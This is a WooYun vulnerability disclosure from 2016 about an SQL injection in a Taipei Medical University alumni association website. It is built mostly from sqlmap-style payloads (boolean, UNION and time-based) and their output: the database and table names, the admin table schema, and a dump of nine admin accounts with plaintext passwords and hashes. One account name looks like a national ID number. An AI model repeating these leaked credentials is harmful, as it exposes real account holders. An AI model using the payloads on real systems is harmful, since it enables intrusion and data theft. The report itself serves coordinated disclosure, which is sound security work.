当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169812

漏洞标题:台北医学大学医学系校友会网站存在SQL注入(大量用户信息、网站管理日志泄漏)(臺灣地區)

相关厂商:台北医学大学医学系校友会

漏洞作者: r1cky_ph3

提交时间:2016-01-14 16:43

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

台北医学大学医学系校友会网站存在SQL注入(大量用户信息、网站管理日志泄漏)

详细说明:

台北医学大学医学系校友会 **.**.**.**
注入点 http://**.**.**.**/News_info.php?id=24

漏洞证明:

注入点 http://**.**.**.**/News_info.php?id=24

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=24 AND 4262=4262
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=-4137 UNION ALL SELECT NULL,NULL,CONCAT(0x71636d6671,0x476974787
06a66614c73,0x71646b6271),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=24 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11


当前用户数据库

current database:   'tmumsorg_manager'


跑表结果

Database: tmumsorg_manager
[12 tables]
+----------------+
| admin |
| contact_us |
| forums |
| forums_detail |
| member_type |
| news |
| newsletter |
| no_member |
| northtreatment |
| photo |
| pub_species |
| publication |
+----------------+


Database: tmumsorg_manager
Table: admin
[24 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| date | date |
| identity | text |
| position | text |
| account | text |
| address | text |
| addressx | text |
| alumnus | text |
| birthday | date |
| category | text |
| donation | text |
| due | text |
| educational | text |
| email | text |
| fax | text |
| grp | text |
| id | int(10) unsigned |
| info | text |
| name | text |
| password | text |
| phone | text |
| sex | text |
| status | text |
| telphone | text |
| title | text |
+-------------+------------------+


Database: tmumsorg_manager
Table: admin
[9 entries]
+------------+----------------------------------+
| account | password |
+------------+----------------------------------+
| rsadmin | d6589bdae89e3032925b5c3fa5738678 |
| nonno | nonno |
| tmums | ffb059247e12bbae13f2d7a4d77b3b4e |
| tmums | ffb059247e12bbae13f2d7a4d77b3b4e |
| sdr22463 | 513513 |
| Iblit | trhunter0421 |
| cy5367 | 2joxuxix |
| A122616889 | 2joxuxix |
| MSE | a9fc1a03386ae38b64e06c8172994963 |
+------------+----------------------------------+


破解管理密码,可进后台,不继续深挖了

修复方案:

过滤

版权声明:转载请注明来源 r1cky_ph3@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-14 23:27

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价